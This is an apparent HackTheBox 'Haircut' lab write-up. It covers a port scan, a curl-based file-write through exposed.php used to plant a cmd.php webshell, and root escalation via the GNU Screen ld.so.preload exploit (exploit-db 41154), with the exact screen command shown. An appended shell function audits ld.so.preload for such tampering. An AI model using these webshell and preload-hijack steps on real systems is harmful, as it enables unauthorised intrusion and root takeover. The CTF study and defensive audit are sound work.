HTB Haircut

PORT SCAN

# Nmap 7.93 scan initiated Thu Dec 15 01:16:36 2022 as: nmap -p- --min-rate 1000 -oN portscan.txt 10.10.10.24
Warning: 10.10.10.24 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.24
Host is up (0.29s latency).
Not shown: 65130 closed tcp ports (reset), 403 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

# Nmap done at Thu Dec 15 01:19:02 2022 -- 1 IP address (1 host up) scanned in 146.69 seconds

Web content discovery

  1. uploads/
  2. exposed.php

exposed.php might run its input as a curl command.

I found we can write some files on the machine.

http://[ip]/cmd.php -o cmd.php

www-data shell

We find the 2 flags in this machine :-)

Privilege escalation


https://www.exploit-db.com/exploits/41154

But I can’t run the binary with the high GLIBC version GLIBC_2.34.
So I compile the files on CentOS, and upload libhax.so and rootshell.

cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
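
A defensive check for the preload tampering shown above, added here as an example and not part of the original writeup: `audit_preload` (a hypothetical helper name) inspects a preload list such as /etc/ld.so.preload for unexpected ownership, group or world write permission, and entries that live in world-writable directories such as /tmp.

```shell
#!/bin/sh
# audit_preload FILE [OWNER_UID]   (OWNER_UID defaults to 0, i.e. root)
# Prints one line per finding; returns 0 when clean, 1 otherwise.
audit_preload() {
    f=$1; owner=${2:-0}; rc=0
    if [ ! -e "$f" ]; then
        # No preload list at all is the normal state on most systems.
        echo "ok: $f does not exist"
        return 0
    fi
    # The list itself must belong to the expected owner ...
    if [ -n "$(find "$f" -prune ! -user "$owner")" ]; then
        echo "finding: $f is not owned by uid $owner"; rc=1
    fi
    # ... and must not be writable by group or others (umask 000 leaves it 0666).
    if [ -n "$(find "$f" -prune \( -perm -0002 -o -perm -0020 \))" ]; then
        echo "finding: $f is group- or world-writable"; rc=1
    fi
    # glibc splits entries on whitespace and ':'; '#' starts a comment.
    for lib in $(sed 's/#.*//' "$f" | tr ':' ' '); do
        dir=$(dirname "$lib")
        if [ ! -e "$lib" ]; then
            echo "finding: entry $lib does not exist (stale entry)"; rc=1
        elif [ -n "$(find "$lib" -prune -perm -0002)" ]; then
            echo "finding: entry $lib is world-writable"; rc=1
        fi
        # A library in a world-writable directory can be swapped by any user.
        if [ -d "$dir" ] && [ -n "$(find "$dir" -prune -perm -0002)" ]; then
            echo "finding: entry $lib sits in world-writable $dir"; rc=1
        fi
    done
    return $rc
}

# Audit the system file by default, or the path given as the first argument.
audit_preload "${1:-/etc/ld.so.preload}" || echo "review the findings above"
```

Any finding on a host that does not deliberately use a preload list is worth treating as an indicator of compromise rather than a misconfiguration.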